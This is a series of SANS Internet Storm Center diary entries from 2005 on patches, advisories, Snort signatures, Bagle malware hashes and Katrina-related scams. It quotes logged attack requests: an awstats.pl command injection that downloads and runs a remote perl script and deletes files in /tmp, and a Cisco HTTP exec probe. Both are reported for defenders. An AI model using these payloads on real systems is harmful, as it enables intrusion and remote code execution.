In the meantime, we've identified thousands of web pages that only exist with the dual purpose of improving each other's search engine rating (by heavy cross linking) and of course to trick unsuspecting users into clicking themselves to never-never land.

Following up on the DNS domains involved in all these scams, it turns out that all the (pyhsical world) addresses used for registering are completely and obviously bogus and made up. It seems as long as the credit card used to pay for the domain doesn't bounce, it isn't overly important to most registrars if the address is anywhere near legit.

Earlier today, Mozilla released the newest stable release of Firefox.  Firefox 1.0.7 is available for download in many languages (sorry Kevin that the KR release isn't ready yet, hopefully it will be soon).

From the release notes available at Mozilla Firefox website:

"This version includes several security and stability fixes, including a fix for a reported buffer overflow vulnerability and a fix for a Linux shell command vulnerability.

Specific changes in Firefox 1.0.7

• Fix for a potential buffer overflow vulnerability when loading a hostname with all soft-hyphens
• Fix to prevent URLs passed from external programs from being parsed by the shell (Linux only)
• Fix to prevent a crash when loading a Proxy Auto-Config (PAC) script that uses an "eval" statement
• Fix to restore InstallTrigger.getVersion() for Extension authors
• Other stability and security fixes

"

Symantec has announced that "NGS Research identified multiple DCOM servers in VERITAS Storage Exec". There is no advisory posted at the NGS Research Advisory page as of this time. The Symantec Advisory says "Multiple VERITAS Storage Exec DCOM server components have been identified as susceptible to buffer overflows through calls to associated ActiveX controls." "Successful exploitation is highly dependent on user involvement for malicious code to gain initial access to the system."

Affected Product	Version
Build Storage Exec	5.3 Rev. 2190
Storage Central	5.2 Rev. 322

Older versions may be affected as well.

We're seeing increased scanning / exploit attempts against the xmlrpc.php vulnerabilities noted in our June 30th diary.  This function library is used in various web-based packages such as PEAR, postnuke, drupal, TikiWiki, and b2evolution.  If you aren't patched yet... well... what are you still sitting here reading for?

The GPL antivirus toolkit for Unix, Clam AV released version 0.87 late friday afternoon GMT.  This update fixes two problems in dealing with packed executables, one which could allow execution of arbitrary code.  Details on the issues can be found here.

It looks like there is a new Bagle variant making the rounds.  The (preliminary) information that we have is that the file arrives as a zipped attachment with a filename including the word "price" (price.zip, price2.zip newprice.zip, 09_price.zip, etc...).  More details as they become available.

This is an update to a snort sig that we posted earlier for the recently announced TWiki vulnerability that allows for remote code execution:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:\
"BLEEDING-EDGE WEB twiki rev access"; flow:to_server,established; \
uricontent:"/TWikiUsers?"; nocase; pcre:"/rev=\d*[^\d\&\n]/Ui"; \
classtype:web-application-activity; reference:url,secunia.com/\
advisories/16820/; sid:2002366; rev:3;)

Note: This is a single line that has been broken to allow for better formatting in the diary.  The "\" characters at the end of the lines above show where the line breaks have been added.  Many thanks to Joe Esler, Chas Tomlin, Jason Brvenik, and Frank Knobbe and all the folks from Bleeding Edge (you guys rock!).

The Internet Storm Center relies heavily on firewall data, to obtain an accurate measure of current Internet threats. It is in particular important to collect data from very diverse submitters, not just from a few large submitters. If you are not already submitting data, here a few tips on how to get started:

First of all: No submitter is too small. In particular cable modem / DSL user data is frequently the most interesting. We can always use more home users submitting data.

If you are able to submit from a large network, try to pick a few IP addresses and only send data from these IP addresses (e.g. a /24). A simple 'grep' may be all thats needed to filter the data, and our prewritten clients can help you with that.

We are interested in rejected packets from the outermost firewall you have access to. All rejected packets that originate from outside of your network are of interest.

We do accept logs via e-mail. It is recommended that you submit your logs about once an hour, but not less then once a day. We do provide a number of scripts to automated the process.

The best reference to get you started is http://www.dshield.org/howto.php. As a quick summary:

• Windows Users

• Unix Users

• Others

We do provide a number of customized analysis features for submitters, which are accessible via DShield.org. For a Demo, see our demo-account.

There were a few posts to the DShield discussion forum today that are worth watching for, even though at the moment they are single observations, and are not part of any trends at the moment.

Andy Green reported that his server received a scan for the vulnerable awstats.pl script, even though the script was not actually present on his server:

[04:06:01 +0100] GET //awstats.pl?configdir=
  |echo%20;cd%20/tmp;rm%20-rf%20*;
  killall%20-9%20perl;wget%20members.lycos.co.uk/mariusbou/a.txt;
  perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1 404 287 -

In an unrelated post, Jakob Staerk reported receiving crafted ICMP "time exceeded in transit" packets hitting his server:

16:18:29.282413 IP (tos 0x0, ttl 243, id 5715, offset 0, 
                    flags [none], length: 56)
  219.158.8.221 > xx.xx.xx.xx: 
icmp 36: time exceeded in-transit for IP
  (tos 0x0, ttl 1, id 6520, offset 0, flags [DF], length: 48)
  xx.xx.xx.xx.11582 > 222.168.227.212.80: [|tcp]
0x0000: 4500 0038 1653 0000 f301 474b db9e 08dd E..8.S....GK....
0x0010: xxxx xxxx 0b00 b1c1 0000 0000 4500 0030 xxxx........E..0
0x0020: 1978 4000 0106 1828 xxxx xxxx dea8 e3d4 .x@....(xxxx....
0x0030: 2d3e 0050 6a78 ab37 ->.Pjx.7 

For additional information about these issues, please see the corresponding DShield posts. (Note that the long lines above were wrapped for readability.)

A recent vulnerability in TWiki software allows remote attackers to execute arbitrary commands on the affected system with the privileges of the Web server process. We received reports that attackers ares beginning to exploit this vulnerability, which increases the severity of this flaw.

To learn more about this problem, and to download a patch, go to:
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev

TWiki is a popular web-based collaboration tool. If you have it installed, we urge you to patch it as soon as possible. We are expecting to see a worm that exploits the recent vulnerability pretty soon.

Chas Tomlin provided us with the following Snort signature, which he put together with help from others:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE WEB twiki rev access"; flow:to_server,established; uricontent:"/bin/view/Main/TWikiUsers?"; nocase; pcre:"/rev=\d+%20/i"; classtype:web-application-activity; reference:url,secunia.com/advisories/16820/; sid:2002366; rev:2;)

This rule is also available from the Bleeding Snort website.

We received an email today from someone who is concerned
that they are being harassed by someone online.  The 
individual was asking the Handler's group for help in 
finding someone to help her track down an online 
attacker.  


I wanted to address this issue here. I have investigated 
similar claim in the past.  Without getting into much 
detail about the particular incident (to protect the 
identity of both the innocent and the guilty) I want to 
discuss my response to those who are concerned about 
Cyber Harassment and Stalking.  


Is it possible that someone could accomplish this? 
Absolutely. Is it likely?  - Not under normal 
circumstances.  


A lot of things could be happening behind the scenes. 


* You may have spyware or viruses on your computer that 
are allowing certain confidential information to leak 
out. 

* You may have given someone more information that you 
should have in a chat room or email.  

* You may have an unprotected computer with lack of 
sufficient protection (firewall,anti-virus program, 
operating system updates, etc). 


In the case that I investigated - the "victim" claimed 
that they knew who the people were that were 
responsible.  There was no evidence that anyone had done 
anything to the computer.  Nothing more than the 
installation of the normal - run of the mill spyware and 
adware was found.  


It is highly unlikely that this type of activity is 
taking place.  What is more than likely taking place is 
what we see evidence of everyday at the Storm Center and 
elsewhere on the Internet.  Take a look at the Internet 
Storm Center - you will see referenced the Survival Time 
and a link to the Survival Time History. The Survival 
Time right now - today is 23 minutes. That means that a 
computer - unprotected with no firewall, anti virus, 
spyware/adware protection will likely become infected in 
just 23 minutes. That is all the longer it takes to 
compromise a brand spanking new computer - out of the 
box.  Now take a look at the History link.  You see that 
we had less than 10 minutes in May 2004 and less than 5 
minutes in August 2004 (Blaster).


Take a look at the Top 10 Ports and you will see that 
there is continuous port activity. That is the nature of 
the Internet with 65,565 ports available you are bound 
to see some of them alive doing things like pop mail 
(110), web (80), DNS (53), etc.


So what can you do to protect yourself and your 
computer? 


Here is a link to the Survival Guide.  This document 
will help you put the things in place to minimize the 
potential for someone to break into your computer.

http://isc.sans.org/presentations/xpsurvivalguide.pdf

What do you do if you think you are being harassed?


Don't jump to conclusions.


Contact your local Police Department or your local FBI 
office.  They can investigate your issues and if they 
suspect that you do have a problem they can conduct a 
full investigation.


Don't give out personally identifiable information 
either online or by telephone if you did not initiate 
the contact.  Use caution when sharing information with 
others - even if you did initiate the contact.  Give 
only the information that is essential to complete the 
transaction or enquiry.


Only you can protect yourself and your identity.

Take a look at the Flash Movie that our own Dr J. put
together.  This shows where the data that has been 
received at the Dshield Database server in the last 5 
minutes originated from.

http://isc.sans.org/packetattack.php

(I particularly like the representation of the data 
received from the US - it appears that Johannes too 
understands that Iowa is indeed the Center of the US.)

Since Microsoft gave us a free month, how are you spending all your newly-found free time?  I'm specifically interested in readers that are custom-coding solutions to security or system administration problems.  Got any C/Perl/Python code that you want to share?  You coders don't get enough credit here, so let's here from you.

For example, last year I looked for a solution to monitor the changes to a Windows file share.  I needed a report at the end of the day showing new files, deleted files, etc.  This would allow me to detect security policy violations in an automated fashion.  I couldn't find anything free or commercial to do it, so I rolled my own in Python and SQLite (a light-weight database engine).  Interestingly, I discussed my project with several Windows system admins and none had ever thought about monitoring a file server in this manner.

Be sure to include whether you would allow us to reprint the code or description of the code on the site.

iDefense has released five vulnerabilities against the Linksys WRT54G wireless access point/switch/router.  Some of these vulnerabilities are very serious.  Users of these products are highly recommended to patch their devices.  Patches for the latest versions are available at  http://www.linksys.com .

The iDefense advisories are here:
iDefense advisory 304
iDefense advisory 305
iDefense advisory 306
iDefense advisory 307
iDefense advisory 308

Apple Computers earlier today released patches for MacOS X versions 10.4.2 and 10.3.9.  These security patches update Java installed on the computer to protect against certain vulnerabilities that could allow attackers to bypass certain security restrictions, disclose sensitive information, or elevate system priviledges.  More infrmation on the details are available at http://www.frsirt.com/english/advisories/2005/1734 or from Apple Information Article 302265.

The downloads are available at Apple Support Download.

Scott Fendley, Handler on Duty

For most of us involved in security in academia, this story is old old news.  But I am going to do it anyway for those new to sometimes hectic world of security on a college or university campus.

There are 2 major mailing lists that are the primary resources for security discussions in this microcosm: Unisog and Educase Security.

First is the Unisog mailing list.  Unisog stands for UNIversity Security Operations Group, and this group was created out of  excellent discussions ocurring after hours or in the hallways at a SANS conference (correct me Unisogers if it was another conference).  It has been around for a number of years and has some very knowledgeable people involved and is usually more technical in nature.  For more information on this mailing list, please see Unisog mailing list information located at lists.sans.org.

Second is the Educause Security Discussion Group.  Educause was formed in the late 1990s by two professional associations with a mission to advance academia by promoting the intelligent use of IT.  A few years back, Educause formed an IT security discussion group to promote awareness, security solutions, effective practices and in general discussion for those in higher education.  In general, I see a policy and administrative level discussion on this list.  This is a great resource to see what your peer institutes are doing, and not have to re-invent the wheel on the more upper level details.  For more information on this mailing list, please see the Educase Security Discussion Group information.

In general, both of these mailing lists are an excellent resources.  There is no reason that those of us that work in the university community have to "re-invent the wheel" on any of our projects no matter if it is technical or administrative in nature.

----
Scott Fendley
Handler on Duty
University of Arkansas

As you all probably know, today is the normal Black Tuesday of the month.  With no Microsoft security patches being released, I guess we can not really call it Black Tuesday.  Perhaps Grey Tuesday, or Gray Tuesday depending on your choice of spelling, would be more correct. 

Microsoft did release a couple of updates today nonetheless.

First, the monthly "Malicious Software Removal Tool" was updated to handle new variations of some new and old pieces of malware.  For more technical details, please go to Microsoft KB Article 890830  for information and a link to the manual download location.

Second,  Microsoft released an update for Windows 2000 SP4 Update Rollup 1.  That would make this, "Microsoft Windows 2000 Service Pack 4, Update Rollup 1 version 2."  Now that is a mouthful!  For those that don't remember, Update Rollup 1 was originally released in June 2005.  This version appears to fix some known problems with the original version that were discovered after the update went out for testing.  For more information please see Microsoft KB Article KB891861.

I have not found any other updated patches or anything else noteworthy on the Microsoft front today.  If I missed something else, please let me or the other handlers know.

----
Scott Fendley, Handler on Duty

Earlier Monday, Snort.org announced a vulnerability in the 2.x series of open source IDS software.  The vulnerability was found in the PrintTcpOptions() function and could allow an attacker to use a malformed, crafted TCP/IP packet to cause a DoS in Snort.  These vulnerabilities involve NULL pointer dereferences which should mean that only a Denial of Service is possible.

JustinF noted earlier today that the original advisory that I grabbed from the snort.org site was not completely accurate. You _do not_ have to be running snort with the -v flag set as there are other execution paths that lead to the PrintTcpOptions() function.  Noteably, the PrintIPPacket() can be used to call the vulnerable function.  This requires you to jump through a few requirements like the packet can not be a fragment[1], and its protocol is TCP.  (For those looking at the code from cvs, this takes a couple levels of following the code to see this connection.)

Justin noted that using the "-A fast", those logging in ASCII mode, and the frag3 and stream4 preprocessors have some potential to get one to the PrintTcpOptions() as well as the initially reported -v flag.

He also noted that there are several bugs in PrintTCPOptions() which is apparent by the changes made to the source which includes nearly all of the TCP options, not just SACK.

Thanks Justin for looking closely at the code and bringing it to our attention.

Fix and Workaround Details:
A fix for this vulnerability was checked into the Snort 2.4 CVS tree on August 23rd, 2005 and is available for download here. This fix will also be included in the upcoming 2.4.1 release.

Proof of Concept Released:

In addition, proof of concept code has been released concerning this vulnerability. 

References:
Snort News
VulnFact Advisory
FRSIRT Bulletin

------------
Scott Fendley, Handler on Duty

We have had reports submitted that web servers running WebCalendar 0.9.x or WebCalendar 1.x are being exploited. Currently some of defacer/cracker starts using WebCalendar php remote injection vulnerability. They are using when defacing web site, uploading Trojan and others. I saw some of defacer group use this kind of method then uploading Trojan which steal bank id/pw from user’s system.

Official WebCalendar releases can be obtained from the SourceForge  development server. The latest version is 1.0.1, please update to latest version.

Secunia Vulnerability description - WebCalendar "includedir" Atbitrary File Inclusion Vulnerability
SecurityFocus Vulnerability description - WebCalendar Send_Reminders.PHP Remote File Include Vulnerability

Kevin Hong
Handler On Duty

Large parts of Los Angeles are currently without power. The outage started about 1pm PST (4pm EST, 8pm UTC). At this point, no Internet links appear to be affected.

LA Times Story

We've received several emails from our readers regarding the new variant bagle. It looks like the new variant bagle is in the wild. Here are little more information. if you have any other new variant, pleae let us know.

Subject : No Subject
Contents : new price or price
Attached file : new_price.zip (12490) or price.zip (12498)
                    new_price.zip : c3954e35d8b9b3a63d42c5718ed1624d
                    price.zip : c16ddcef3b01f1ec46750f7a1991ee91

Inside of zip file : 1.cpl (14340) or price.cpl (14340)
                        1.cpl (4fb426de872ee9b20c3312fae3adf018)
                         price.cpl (951053055f16d331a42475c209803430)

Kevin Hong  - khong at kisa.or.kr
Handler on Duty

Firefox version 1.5 beta out

You can get from here :  FireFox 1.5 Beta 1

One of our readers, Matthew, submitted that there is a new version of Firefox available for download.  The latest version of the Firefox web browser, 1.5, is out in beta 1.  After personally installing it earlier today I have found it be incredibly stable and feature rich.  According to Mozilla, Firefox 1.5 beta 1 is still vulnerable to the IDN buffer overflow vulnerability published on Sep. 8th.  It is highly recommended that all users take the steps indicated in the link below to secure against this vulnerability.

Patch information
https://addons.mozilla.org/messages/307259.html


Tony Carothers
Handler on Duty

iDefense has released a new vulnerability within GNU Mailutils.  Mailutils is a collection of mail-related utilities, with the vulnerability applying specifically to the 0.6 version and imap4d daemon.  The exploit "could allow an authenticated attacker to execute arbitrary code."  As well, iDefense is "unaware of any effective workaround for this issue".

Patch Link
http://savannah.gnu.org/patch/index.php?func=detailitem&item_id=4407

Vulnerability Link
http://www.idefense.com/application/poi/display?id=303

GNU Mailutils information
http://www.gnu.org/software/mailutils/mailutils.html


Tony Carothers
Handler on Duty

On yesterday diary about Firefox vulnerability, in case you wonder how to get to the site, "What Mozilla users should know about the IDN buffer overflow security issue", here is the link.

Netscape also suffers similar URL Domain Name Buffer Overflow as Firefox. The vulnerability has been confirmed in versions 8.0.3.3 and 7.2. Other versions may also be affected. Currently there is no solution available besides not to browse untrusted websites. You can read the details at Secunia.

The International Committee of the Red Cross (ICRC) has setup a website to allow people to seek information about relatives who may be affected by the hurricane. The website allows you to register your address so that you can be contacted by others. It may also help you to locate people who may be affected by the hurricane.

However, note that the ICRC has no means of verifying the information sent through the network and thus cannot accept responsibility for any inaccurate information made available on the website.

You can find more details at http://www.familylinks.icrc.org/katrina.
 
Thanks to Melvin. 

According to notes from users, and Keynote, AT&T is currently experiencing outages across its network. We do not have any details right now. This outage may affect the latency or reachability for a large number of sites.

Looks like we will have a (almost) calm tuesday next week.

Next week, we will have just one Micosoft Security Bulletin to be relealed on the monthly security bulletins. But, it is rated as critical, which will deserve attention.

Our good reader Juha-Matti sent this to us:
According to Security Bulletin Advance Notification Program page Microsoft will release one monthly security bulletin and it is affecting Windows. The highest maximum severity rating for this update is critical. Company says that these updates may require a restart to take effect.

Additionally, like typical, they will release an updated version of Malicious Software Removal Tool on Windows/Microsoft Update, Windows Server Update Services and Download Center.

Something nice to start a friday morning...
An unpachted vulnerability was disclosed today in Firefox browser. According the advisory, "...the vulnerability is caused due to an error in the handling of an URL that contains the 0xAD character in its domain name. This can be exploited to cause a heap-based buffer overflow.

Successful exploitation crashes Firefox and may potentially allow code execution but requires that the user is tricked into visiting a malicious web site or open a specially crafted HTML file."

Lets hope for a quick patch!

You can check the original advisory at Security Protocols and Secunia
Thanks Pat for pointing this out.


-------------------------------------------------------------------
Handler on Duty: Pedro Bueno < pbueno $$ isc . sans . org >

Cisco announced a vulnerability in the 11500 and 11501 content switches with the optional SSL module.
http://www.cisco.com/warp/public/707/cisco-sn-20050908-css.shtml

The scope appears to be limited. You must be using certificate authentication and the CSS must be the SSL server. In the affected cases if ssl fails to renegotiate a session at the appropriate time it may be possible to bypass authentication. Those using SSL are strongly encouraged to upgrade as soon as possible.

The main circuit which supports the web site, mail and a handful of other services went down yesterday for 90 minutes. After it came back up there were continual errors on the line that interferred with maintining established TCP connections -- ICMP/UDP seemed to still work ok. Some work on one end of a lengthy coax cable run seemed to turn the trick and get things back up. So "We're back!"

Cisco announced today there is a buffer overflow in the Firewall Authentication Proxy of Cisco IOS that can be used for a denial of service attack.  Cisco's advisory is here.

The affected versions of Cisco IOS are 12.2ZH, 12.2ZL, 12.3, 12.3T, 12.4, and 12.4T (all versions).  The vulnerability will not affect devices that are not configured for Firewall Authentication Proxy for FTP or Telnet Sessions.  There is a rather large table of remediation options that is included with Cisco's advisory.  FrSIRT and Symantec have this listed as a high risk alert.  Either turn off the authentication proxy or patch your devices as soon as possible.

Our Network Operations Center lost connectivity around noon (EDT) today. At this point,
most of the connectivity has been restored, but the site is still sluggish. Our ISP (Sprint) is currently working on a resolution.

We keep receiving a offers to volunteers in large numbers. Right now, we forward them to the Red Cross. However, a couple of Univ. Pennsylvania students are now working on a database for us to track these applications. I hope to have more to report soon.

Please use our Contact Page to sign up. Do not upload Word documents or PDFs, but please just include details in plain text.

Responding to many user requests, and requests from our handlers, we are changing the diary format.

Starting with this diary, we will no longer create one daily diary, but instead one or more "story". Each story may be created by a different handler, and some stories may span more then one day. This will allow us to keep thoughts together for events that last more then one day.

In addition handlers have now a nicer editor to create diaries, allowing for more formating options. For example, we can now include images and tables.

Old diaries will remain 'one story'. We may break them up in the future. Soon, you will be able to compare different versions of a story as it may change.

Volunteer Response

I've spent most of the day updating the contact database of people volunteering to help out with the Red Cross kiosk project, see http://isc.sans.org/diary.php?date=2005-09-04
My fingertips are are still warm-- but it's a good pain.

OpenSSH issues

An update to OpenSSH, version 4.2p1 was released addressing issues with GSSAPI and port forwarding. You can grab the latest here: ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/
More on the vulnerabilities:
http://secunia.com/advisories/16686/
http://www.securityfocus.com/bin/14727
http://xforce.iss.net/xforce/xfdb/22115

Bluetooth delay

When I last posted, I mentioned performing a bluetooth audit of a disaster drill. I received few questions on what I did to perform the audit. Sadly, today was spent hopping between Storm Center work and Red Cross work, so I don't have the promised article ready yet. Perhaps my next shift...

Call for Volunteers

The Red Cross needs volunteers with system administration, network engineering and information security (infosec) expertise to assist in the design and implementation of a network of Internet kiosks. These kiosks will be deployed to all of the Red Cross shelters to be used be people displaced by the hurricane and flooding to report that they are alive and to try to contact others.

The Red Cross will be requiring a great deal of help to stand up the infrastructure as well as to actively safeguard it from eventual infection attempts from bots, worms, viruses, spyware and other sorts of malware.

Once we have accurate point-of-contact (POC) information for the Red Cross for this, we will post it in the ISC diary so folks can contact the Red Cross directly. In the meantime, if you are interested in helping the Red Cross in this challenge, please submit your contact information and availability to the Internet Storm Center here and we will pass your information on to the Red Cross. Please provide your name, location, phone number where you can be reached, and an email address. Also, a short list or summary of the skills you can provide.

SANS and the ISC would like to encourage folks with GIAC certifications and a desire to volunteer to help out the Red Cross with this effort. Even if this specific method of assistance is not feasible for you, any way in which you can assist the Red Cross, either nationally or in your local chapter, or perhaps assist another charitable organization such as the Salvation Army or local organizations, would be greatly appreciated at this time.

For more information about this technical challenge the Red Cross is facing, please see this article from the Washington Post.

One other request - the Shared Resources High Frequency Radio Program (SHARES) at the US Department of Homeland Security is looking for assistance from the amateur radio community to assist in running SHARES stations. According to a note from SHARES, "...we always can use more SHARES operators in additon to the 1,200 we already have in our databases. We definitely could use more SHARES stations directly in the affected area, such as New Orleans, Baton Rouge, etc. Have them at key places, such as EOCs, refugee camps, logistic centers are all smart ideas." Contact information for those able to assist is at http://www.ncs.gov/n3/shares/contact.html

Red Cross Associated Sites

The Red Cross has posted a list of official cash donation sites for businesses and organizations affiliated with the Red Cross. This list is not all-inclusive but can be used as a starting point.

Katrina Related Fraud Continues

We continue to see more and more new web sites popping up proclaiming to be a charitable organization who is collecting donations for folks affected by Katrina. While there are some valid new sites out there, by far the majority of these continue to be nefarious in nature, setup by folks just out to make a quick buck.

If you wish to make a donation of cash or materials to help folks impacted by Katrina, I would recommend you provide your donations to an older, established organization and not to one formed in the last week. While there are valid new charities out there, they are quite possibly just learning how to deal with the distribution of the donations. An established organization should already have procedures, contacts and experience for dealing with the distribution of donations.

---------------
David Goldsmith
dgoldsmith at sans.org

While Katrina information is still flowing heavily, things elsewhere continue as usual. Microsoft has released an update that deals with the Windows Firewall, however is not listing it as "Critical".

Windows Update

One of our readers, Thomas, submitted this morning that Microsoft has released a new update. This update applies to Microsoft Windows XP Service Pack 2 (SP2) or Microsoft Windows Server 2003 Service Pack 1 (SP1). This patch fixes a condition where an exception may not show up in the Windows Firewall GUI, if this exception is created by modifying the registry directly. In order to do this, administrative priveleges are required on the box. The danger in this flaw is that a hacker could open a backdoor that would not be shown in the GUI Firewall ruleset. Just a side note, MS is not calling this a flaw, but an "unexpected behavior".


Article Link
http://support.microsoft.com/kb/897663

Download link


I will be adding new information as it comes in today regarding ways to help the hurricane victims. For now, please take a look at Jim Clausing's excellent write-up yesterday.

http://isc.sans.org/diary.php?date=2005-09-02


The last word

I'd like to give thanx for the help today, and give credit to all those that have been working hard to curb the fraudulent websites popping up.
Thanx to all the other Handlers, including Tom L., Lorna H., Scott F., Dr. J., Marcus S., Patrick N., and the rest of the Handlers. I'd also like to give a *big* thanx to the ISP's out there who've done some 'creative' clean-up on these sites as well.

Thank you!
Tony Carothers
Handler on Duty

IT Help For Katrina victims

We did get requests from a number of people who would like to help any way they can. If you know of any web sites where people can offer help, or ask for help, let us know. We will setup a page with links to various sites. If you are in need of IT assistance, or if you would like to provide some, let us know and we will try to match up helpers and people in need. FEMA has a listing of organizations that accept cash donations as well as materials/volunteer contributions: http://www.fema.gov/press/2005/katrinadonations.shtm . UPDATE: (23:25 UTC) One organization that we've been made aware of that is in need of people with technical skills is part-15.org. They are apparently coordinating the FCC/FEMA efforts to reconstruct the communications infrastructure in the disaster area. They have a need for systems integrators and network engineers, see http://www.part-15.org/emergencyrelief/katrina.html Another one that we've been made aware of that is coordinating relief activity for educational institutions (not limited to technical/IT) is Educause.
END UPDATE Our handler Kevin notes: "For those that are action oriented, contact your local chapter of the American Red Cross (use the "find your local chapter feature" here: http://www.redcross.org/services/disaster ) and talk to their volunteer services coordinator. They will enter you into their training program (I know that a lot are accelerating the training for national responders now.) There is plenty of geek-work to be had setting up the communications network to link LANs, wireless, satellite, VoIP, etc. Just be willing to give them three weeks of your life." Do not travel to the disaster area without coordinating with one of the relief agencies first! See http://www.fema.gov and http://www.redcross.org for information on making donations/volunteering. UPDATE: (17:20 UTC) We received several notes about e-mail purportedly from the American Red Cross, but pointing to arc.convio.net possibly being a scam, this is not the case. They (Convio) are handling online donations for the Red Cross, though they apparently had some problems yesterday. We also received a note from Mike in the InfoSec group at the American Red Cross, asking that any e-mail or web sites that look like they might be scams trying to use the Red Cross name, be forwarded to infosec@usa.redcross.com.
END UPDATE

More Katrina Malware

The latest malware spotted uses the subject line: "Is Government Reaction to Katrina Because of Loss of Life, or Loss of Property?". A link in the email will lead to the malware.

Gas shortage hoax e-mail

There is a hoax e-mail making the rounds about a gas shortage. Don't run out and create a shortage. And now, we have reports from one of our readers (thanx, Rikki) who is seeing e-mails about a gas shortage floating around. The facts are, yes, there have been gas stations that have run out of gasoline. That is mostly because people have flocked to them to fill up fearing a shortage (can you say self-fulfilling prophecy?). Yes, some refining capacity in the US has been impacted by the hurricane, but we won't know the impact of that for some time yet. In the meantime, there is gasoline available in the US, and stations are still getting deliveries. Yes, the prices have gone up and conserving would be a good idea, but there is no evidence of an imminent widespread shortage outside of the areas that suffered direct infrastructure damage earlier this week. Remain calm.

MS05-043 exploit in the wild?

We are hearing about possible exploits to the vulnerability described in MS05-043 (the print spooler service) in the wild. If anyone has captures of such a beast, plesae share it with our malware group. In any event, since Microsoft rated this vulnerability as a critical, I hope everyone is patched by now (a guy can dream can't he?).

Scanning for old Cisco vulnerabilities

We started hearing reports last week of machines scanning web servers looking for an odd URL. The GET request is

    GET /level/16/exec/-///pwd  HTTP/1.0

This scanning is apparently picking up steam. We're not sure exactly why this is increasing since this exploit is for a Cisco vulnerability from 2001, so hopefully, most routers out there have long since been patched against this one (and a number of others that have come after). Also, our usual advice for practicing defense-in-depth suggests that, a) if you don't use the http management feature of the router, turn it off; and b) if you do use it, it should only be accessible from a protected management network.

Happy Labor Day

For those of you in the US, I hope you have a happy, uneventful holiday weekend.
-----------------
Jim Clausing (with mucho help from the other handlers, thanx gang)
Chief Bot Herder

Katrina Malware

It didn't take long. This morning, we received an email which is promissing news about the Hurricane. However, the site it links to appears to provide malware in addition to a brief news article. The text of the email (the original is in HTML):

Subject: Re: u1 Katrina killed as many as 80 people.

Just before daybreak Tuesday, Katrina, now a tropica
l storm, was 35 miles
northeast of Tupelo, Miss., moving north-northeast with
 winds of 50 mph. 
Forecasters at the National Hurricane Center said the amou
nt of rainfall 
has been adjusted downward Monday.

Mississippi Gov. Haley Barbour said Tuesday that Hur
ricane Katrina killed 
as many as 80 people in his state and burst levees in
Louisiana flooded New 
Orleans.

Read More..

'Read More..' links to nextermest.com [DO NOT VISIT! MALWARE!]. We are currently analyzing this page. It uses obfuscated javascript to download what looks like a .hta exploit.

Katrina Donation Scams

A couple of the domains we discovered yesterday removed the paypal button. Again, please let us know if you find any suspect domains. There are now about 230 .com domains that contain the strings 'katrina' and 'hurrican'. We could use your help checking out domains we found that 'sound suspect'. These have been filtered from the .com zone file using keywords like 'katrina'. Lots of innocent domains, so don't use it as a block list just yet. We are trying to anotate this list as needed. NOTE: If you send us an anotation to add, we will add an e-mail address of yours to 'sign' the comment. The email address will be obfuscated. Unsigned comments come from our ISC handler team. http://isc.sans.org/katrina.com.txt Susan Bradley had this nice remark about "cyber looting" on the patch management list: "to the folks behind this one....sick guys....really sick... you know how much small businesses are going to need geek/IT help in the coming months and all you guys can do is to code up stuff like this? How about donating to the red cross? How about volunteering to help a small business owner displaced by Katrina reset up MX records, A records? How about doing something useful instead of this stuff? Okay rant box off"

Dameware Exploit

We do see pretty stong scanning for the recent Dameware exploit. The Dameware.com site is located in New Orleans and not reachable since the storm. However, you can download the latest version from the UK site: http://www.dameware.co.uk/thankyoudownload.asp?group=Downloads
(thanks David for the UK URL). --------